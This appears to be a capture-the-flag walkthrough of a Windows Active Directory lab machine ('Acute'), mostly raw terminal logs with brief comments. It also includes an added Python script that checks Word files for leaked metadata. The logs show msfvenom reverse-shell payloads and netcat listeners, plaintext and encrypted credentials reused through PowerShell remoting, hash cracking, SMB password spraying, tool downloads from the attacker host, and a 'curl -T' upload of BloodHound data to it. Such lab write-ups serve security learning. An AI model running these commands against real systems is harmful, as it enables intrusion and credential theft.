└─$ sudo nmap -sS 10.10.11.145 -p- --min-rate=3000
Nmap scan report for 10.10.11.145
Host is up (1.0s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT    STATE SERVICE
443/tcp open  https
└─$ sudo nmap -sS 10.10.11.145 -p443 -sCV --min-rate=3000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-05 22:11 EST
Nmap scan report for 10.10.11.145
Host is up (0.58s latency).

PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after:  2030-01-04T06:34:58
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
|_  http/1.1
|_ssl-date: 2025-03-06T02:54:15+00:00; -17m47s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
https://atsserver.acute.local/New_Starter_CheckList_v7.docx
Resolving atsserver.acute.local (atsserver.acute.local)... 10.10.11.145
Connecting to atsserver.acute.local (atsserver.acute.local)|10.10.11.145|:443... connected.
WARNING: The certificate of ‘atsserver.acute.local’ is not trusted.
WARNING: The certificate of ‘atsserver.acute.local’ doesn't have a known issuer.
HTTP request sent, awaiting response... 200 OK
Length: 34566 (34K) [application/vnd.openxmlformats-officedocument.wordprocessingml.document]
Saving to: ‘New_Starter_CheckList_v7.docx’

New_Starter_CheckList_v7.docx 100%[=========================================================================================================>]  33.76K  --.-KB/s    in 0.03s
└─$ exiftool New_Starter_CheckList_v7.docx
ExifTool Version Number         : 13.00
File Name                       : New_Starter_CheckList_v7.docx
Directory                       : .
File Size                       : 35 kB
File Permissions                : -rw-rw-r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x079b7eb2
Zip Compressed Size             : 428
Zip Uncompressed Size           : 2527
Zip File Name                   : [Content_Types].xml
Creator                         : FCastle
Description                     : Created on Acute-PC01
Last Modified By                : Daniel
Revision Number                 : 8
Last Printed                    : 2021:01:04 15:54:00Z
Create Date                     : 2021:12:08 14:21:00Z
Modify Date                     : 2021:12:22 00:39:00Z
Template                        : Normal.dotm
Total Edit Time                 : 2.6 hours
Pages                           : 3
Words                           : 886
Characters                      : 5055
Application                     : Microsoft Office Word
Doc Security                    : None
Lines                           : 42
Paragraphs                      : 11
Scale Crop                      : No
Heading Pairs                   : Title, 1
Titles Of Parts                 :
Company                         : University of Marvel
Links Up To Date                : No
Characters With Spaces          : 5930
Shared Doc                      : No
Hyperlinks Changed              : No
App Version                     : 16.0000
This gives the following information: the creator is FCastle and the hostname is Acute-PC01.
Creator                         : FCastle
Description                     : Created on Acute-PC01
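As an added example (not part of the original write-up), a small Python checker that reads the same OOXML property parts exiftool reported on (docProps/core.xml and docProps/app.xml) and flags the fields that gave away the account names, the hostname and the company above; the sample document is constructed in memory, so it runs offline. Running this against a real .docx before it is published is one way to catch this kind of leak.

```python
"""Audit a .docx for identifying metadata before it is published (added example)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}

# (zip part, element, label): the fields that leaked identity in the write-up
FIELDS = [
    ("docProps/core.xml", "dc:creator", "Creator"),
    ("docProps/core.xml", "cp:lastModifiedBy", "Last Modified By"),
    ("docProps/core.xml", "dc:description", "Description"),
    ("docProps/app.xml", "ep:Company", "Company"),
    ("docProps/app.xml", "ep:Template", "Template"),
]

# Word's default description text, "Created on <computer name>"
HOSTNAME_HINT = re.compile(r"created on\s+([\w.-]+)", re.IGNORECASE)


def read_docx_properties(data: bytes) -> dict:
    """Return {label: value} for every populated identifying field."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        for part, element, label in FIELDS:
            if part not in names:
                continue
            node = ET.fromstring(z.read(part)).find(element, NS)
            if node is not None and node.text and node.text.strip():
                found[label] = node.text.strip()
    return found


def audit_docx(data: bytes) -> list:
    """Return human-readable findings for the metadata that should be stripped."""
    props = read_docx_properties(data)
    findings = []
    for label in ("Creator", "Last Modified By"):
        if label in props:
            findings.append(f"{label} reveals an account name: {props[label]}")
    m = HOSTNAME_HINT.search(props.get("Description", ""))
    if m:
        findings.append(f"Description reveals a hostname: {m.group(1)}")
    if "Company" in props:
        findings.append(f"Company reveals the organisation: {props['Company']}")
    return findings


def build_sample_docx(creator, modified_by, description, company) -> bytes:
    """Constructed minimal .docx (property parts only) used as sample input."""
    core = (
        f'<cp:coreProperties xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}">'
        f"<dc:creator>{creator}</dc:creator>"
        f"<cp:lastModifiedBy>{modified_by}</cp:lastModifiedBy>"
        f"<dc:description>{description}</dc:description></cp:coreProperties>"
    )
    app = (f'<Properties xmlns="{NS["ep"]}"><Company>{company}</Company>'
           "<Template>Normal.dotm</Template></Properties>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("docProps/core.xml", core)
        z.writestr("docProps/app.xml", app)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("FCastle", "Daniel", "Created on Acute-PC01", "University of Marvel")
    for finding in audit_docx(sample):
        print(finding)
```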
It is an onboarding document that contains some web paths and related sensitive information.
Here it links to a web path.
This says that only Lois is authorized to change group membership, and only Lois can become site admin.
Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin.
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.145] 49785
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6
C:\Windows\system32>qwinsta
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
>console           edavies                   1  Active
 31c5ce94259d4...                        65536  Listen
Normally a target box rarely has a user sitting in an active RDP session, so it is worth finding out what that RDP user is doing.
I'm using msf for screen monitoring here; I'm not used to CS.
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=10087 -f exe -o t.exe
Warning: KRB5CCNAME environment variable not supported - unsetting
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: t.exe
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
Set the options and start the listener.
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.16.4
LHOST => 10.10.16.4
msf6 exploit(multi/handler) > set LPORT 10087
LPORT => 10087
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.4:10087
Run the payload.
PS C:\Utils> .\t.exe
That gives a shell.
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                     Connection
  --  ----  ----                     -----------                     ----------
  58        meterpreter x64/windows  ACUTE\edavies @ ACUTE-PC01      10.10.16.4:10087 -> 10.10.11.145:49793 (172.16.22.2)
PS C:\utils> Get-PSSessionConfiguration
Get-PSSessionConfiguration
Get-PSSessionConfiguration : Access is denied. To run this cmdlet, start Windows PowerShell with the "Run as administrator" option.
At line:1 char:1
+ Get-PSSessionConfiguration
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Get-PSSessionConfiguration], InvalidOperationException
    + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetPSSessionConfigurationCommand
PS C:\utils> $passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
PS C:\utils> $cred = New-Object System.Management.Automation.PSCredential("acute\imonks",$passwd)
$cred = New-Object System.Management.Automation.PSCredential("acute\imonks",$passwd)
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { Get-Culture }
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { Get-Culture }
The term 'Get-Culture' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
    + CategoryInfo          : ObjectNotFound: (Get-Culture:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
    + PSComputerName        : ATSSERVER
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51';$passwd = $securepasswd | ConvertTo-SecureString;$creds = New-Object System.Management.Automation.PSCredential("acute\jmorgan", $passwd);Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds}
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51';$passwd = $securepasswd | ConvertTo-SecureString;$creds = New-Object System.Management.Automation.PSCredential("acute\jmorgan", $passwd);Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds}
The term 'ConvertTo-SecureString' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
    + CategoryInfo          : ObjectNotFound: (ConvertTo-SecureString:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
    + PSComputerName        : ATSSERVER
The term 'New-Object' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
    + CategoryInfo          : ObjectNotFound: (New-Object:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
    + PSComputerName        : ATSSERVER
The term 'Invoke-Command' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
    + CategoryInfo          : ObjectNotFound: (Invoke-Command:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
    + PSComputerName        : ATSSERVER
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=10089 -f exe -o a.exe
Warning: KRB5CCNAME environment variable not supported - unsetting
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: a.exe
Change the listener port and run it as a background job.
msf6 exploit(multi/handler) > set LPORT 10089
LPORT => 10089
[*] Started reverse TCP handler on 10.10.16.4:10089
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
└─$ nc -lvnp 10088
listening on [any] 10088 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.145] 49840
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6
User Name     SID
============= ==============================================
acute\jmorgan S-1-5-21-1786406921-1914792807-2072761762-1108

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ===============================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
└─$ hashcat hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

1000 | NTLM | Operating System

-------------------------------------------------------------------------------
Administrator            awallace                 chall
edavies                  Guest                    imonks
jmorgan                  krbtgt                   lhopkins
The command completed with one or more errors.
I want to spray passwords directly against 172.16.22.1, so first add a route.
msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                     Connection
  --  ----  ----                     -----------                     ----------
  60        meterpreter x64/windows  ACUTE\edavies @ ACUTE-PC01      10.10.16.8:10087 -> 10.10.11.145:49878 (172.16.22.2)
msf6 auxiliary(scanner/smb/smb_login) > set user_file userlistt
user_file => userlistt
Running it directly seems to have a problem.
msf6 auxiliary(scanner/smb/smb_login) > set SMBDomain 'acute.local'
SMBDomain => acute.local
msf6 auxiliary(scanner/smb/smb_login) > rerun
[*] Reloading module...
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { ls ~ }
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net user /domain }
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net user /domain }

User accounts for \\

-------------------------------------------------------------------------------
Administrator            awallace                 chall
edavies                  Guest                    imonks
jmorgan                  krbtgt                   lhopkins
The command completed with one or more errors.
User Name      SID
============== ==============================================
acute\awallace S-1-5-21-1786406921-1914792807-2072761762-1104

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
ACUTE\Managers                             Group            S-1-5-21-1786406921-1914792807-2072761762-1111 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                       Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

-------------------------------------------------------------------------------
Administrator            awallace                 chall
edavies                  Guest                    imonks
jmorgan                  krbtgt                   lhopkins
The command completed with one or more errors.
Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin.
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net groups /domain}

Group Accounts for \\

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Managers
*Protected Users
*Read-only Domain Controllers
*Schema Admins
*Site_Admin
The command completed with one or more errors
Among them there is a Site_Admin group.
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net group Site_Admin /domain}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net group Site_Admin /domain}
Group name     Site_Admin
Comment        Only in the event of emergencies is this to be populated. This has access to Domain Admin group

Members

-------------------------------------------------------------------------------
The command completed successfully.
There is a comment on this group: it is only to be populated in emergencies, and it supposedly has access to the Domain Admins group.
Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net user lhopkins /domain}
User name                    lhopkins
Full Name                    Lois Hopkins
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            21/12/2021 14:51:53
Password expires             Never
Password changeable          22/12/2021 14:51:53
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   14/03/2025 13:58:26

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

PS C:\utils>
PS C:\utils> date
date
14 March 2025 14:01:27
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { net user awallace /domain}
User name                    awallace
Full Name                    Aileen Wallace
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            21/12/2021 14:50:36
Password expires             Never
Password changeable          22/12/2021 14:50:36
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   14/03/2025 14:29:59

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Managers
                             *Site_Admin
The command completed successfully.
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls ~ }
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls ~ }
[ATSSERVER] Connecting to remote server ATSSERVER failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (ATSSERVER:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { curl 10.10.16.8/nc64.exe -o C:/a.exe}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { curl 10.10.16.8/nc64.exe -o C:/a.exe}
The term 'curl.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
    + CategoryInfo          : ObjectNotFound: (curl.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
    + PSComputerName        : ATSSERVER
└─$ nc -lvnp 10088
listening on [any] 10088 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 57496
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

curl 10.10.16.8/SharpHound.exe -o SharpHound.exe
PS C:\Users\awallace\Documents> .\SharpHound.exe
.\SharpHound.exe
2025-03-11T15:38:19.5992713+00:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2025-03-11T15:38:19.6773937+00:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2025-03-11T15:38:19.6930183+00:00|INFORMATION|Initializing SharpHound at 15:38 on 11/03/2025
2025-03-11T15:38:19.7867734+00:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for acute.local : ATSSERVER.acute.local
2025-03-11T15:38:19.8023986+00:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2025-03-11T15:38:19.8962192+00:00|INFORMATION|Beginning LDAP search for acute.local
2025-03-11T15:38:19.9117741+00:00|INFORMATION|Producer has finished, closing LDAP channel
2025-03-11T15:38:19.9117741+00:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-03-11T15:38:50.2656371+00:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2025-03-11T15:39:03.4265787+00:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2025-03-11T15:39:03.4422041+00:00|INFORMATION|Output channel closed, waiting for output task to complete
2025-03-11T15:39:03.4890789+00:00|INFORMATION|Status: 113 objects finished (+113 2.627907)/s -- Using 43 MB RAM
2025-03-11T15:39:03.4890789+00:00|INFORMATION|Enumeration finished in 00:00:43.6059014
2025-03-11T15:39:03.5515810+00:00|INFORMATION|Saving cache with stats: 72 ID to type mappings.
 75 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2025-03-11T15:39:03.5515810+00:00|INFORMATION|SharpHound Enumeration Completed at 15:39 on 11/03/2025! Happy Graphing!
Transfer it out.
PS C:\Users\awallace\Documents> cmd /c curl -T ./20250311153902_BloodHound.zip 10.10.16.8:81
cmd /c curl -T ./20250311153902_BloodHound.zip 10.10.16.8:81
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 13348    0     0  100 13348      0   2832  0:00:04  0:00:04 --:--:--  2832
└─$ nc -lvnp 81 > blood.zip
listening on [any] 81 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 57555